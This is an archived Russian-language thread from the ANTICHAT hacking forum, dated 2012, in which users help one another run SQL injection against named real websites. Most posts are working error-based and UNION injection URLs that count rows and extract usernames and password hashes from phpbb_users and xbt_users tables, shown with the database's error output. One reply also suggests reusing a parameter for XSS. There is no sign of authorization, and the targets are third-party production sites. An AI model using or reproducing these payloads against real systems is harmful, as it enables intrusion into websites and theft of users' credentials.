ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.03.2012, 17:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
такс, тут ещо проблема
http://torrnado.ru/peerlist.php?id=982+and%28select+1+from%28select+c ount%28*%29,concat%28%28select+column_name+from+in formation_schema.columns+where+table_name=0x706870 62625f7573657273+limit+19000,1%29,0x00,floor%28ran d%280%29*2%29%29x+from+information_schema.tables+g roup+by+x%29a%29--+
таблици вывело нормально
отсюда torrent:xbt_users:1567810 нехочет выводить кольнку pass(не могу поверить что она пустая)
и
нхочет вобще выводить колонки и инфу из torrenthpbb_users:1551912
ну пустой она быть нможет так как там всётак есть форум с юзерами)) как мн ето всё вывести?
|
|
|
|
25.03.2012, 17:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от qaz
qaz said:
ну пустой она быть нможет так как там всётак есть форум с юзерами))
Так не убеждаются, убеждаются так:
Код:
Code:
http://torrnado.ru/peerlist.php?id=982+and(select+1+from(select+count(*),concat((select+concat(count(*),0x00)+from+phpbb_users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
Код:
Code:
Duplicate entry '1566699' for key 'group_key' [1062]
1566699 пользователей.
Код:
Code:
http://torrnado.ru/peerlist.php?id=982+and(select+1+from(select+count(*),concat((select+concat(count(*),0x00)+from+xbt_users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
Код:
Code:
Duplicate entry '1567844' for key 'group_key' [1062]
1567844 пользователей.
А вот и вывод:
Код:
Code:
http://torrnado.ru/peerlist.php?id=982+or+(@:=1)||@+group+by+concat((select+substr(concat_ws(0x3a,username,user_password),1,100)+from+phpbb_users+limit+1,1),@:=@-1)having+@||min(@:=0)--+f
...
|
|
|
|
25.03.2012, 17:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Ereee
Ereee said:
Так не убеждаются, убеждаются так:
Код:
Code:
http://torrnado.ru/peerlist.php?id=982+and(select+1+from(select+count(*),concat((select+concat(count(*),0x00)+from+phpbb_users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
Код:
Code:
Duplicate entry '1566699' for key 'group_key' [1062]
1566699 пользователей.
Код:
Code:
http://torrnado.ru/peerlist.php?id=982+and(select+1+from(select+count(*),concat((select+concat(count(*),0x00)+from+xbt_users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
Код:
Code:
Duplicate entry '1567844' for key 'group_key' [1062]
1567844 пользователей. ну так я же и написал
отсюда torrent:xbt_users:1567810
torrenthpbb_users:1551912
чё ето за чудо конструкция такая?
(@:=1)||@
где в муналах по sql я про неё могу почитать
|
|
|
|
25.03.2012, 17:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от qaz
qaz said:
чё ето за чудо конструкция такая?
(@:=1)||@
где в муналах по sql я про неё могу почитать
Переменные, как не сложно догадатся.
|
|
|
|
25.03.2012, 17:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
http://www.scientific-work.ru/index.php?id=303+union+select+1,2,3,4,5,6,7,8,9,10--+
тут не пойму как данные вывести
что не подставлю лимит или - пишет что не такой страници
и тут тоже
http://www.ivrus.biz/showcat.php?id=7+union+select+version%28%29,versio n%28%29,version%28%29--+
|
|
|
|
25.03.2012, 17:54
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
http://www.scientific-work.ru/index.php?id=-303+union+select+1,2,3,4,5,6,7,version(),0x1,10--+ Вот так. Данные при редиректе в строке URL.
|
|
|
25.03.2012, 18:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от qaz
qaz said:
и тут тоже
http://www.ivrus.biz/showcat.php?id=7+union+select+version%28%29,versio n%28%29,version%28%29--+
Вывода нет походу:
http://www.ivrus.biz/showcat.php?id=7-9999999.9+union+select+user(),user(),user()--+f
Но за то, можно заюзать как XSS.
|
|
|
|
25.03.2012, 18:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
http://board.ugmk.info/?rub=topic&page=3144&from=943260
а тут как? что не подставлю постоянно ошибка
|
|
|
|
25.03.2012, 18:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от qaz
qaz said:
http://board.ugmk.info/?rub=topic&page=3144&from=943260
а тут как? что не подставлю постоянно ошибка
В LIMITе там, не раскрутишь.
Крути эту:
http://board.ugmk.info/?b=1332679205
|
|
|
|
25.03.2012, 18:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Ereee
Ereee said:
В LIMITе там, не раскрутишь.
Крути эту:
http://board.ugmk.info/?b=1332679205
ок, а тут как?
http://baratro.ru/subcat.php?id=22'
таже самая проблема
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
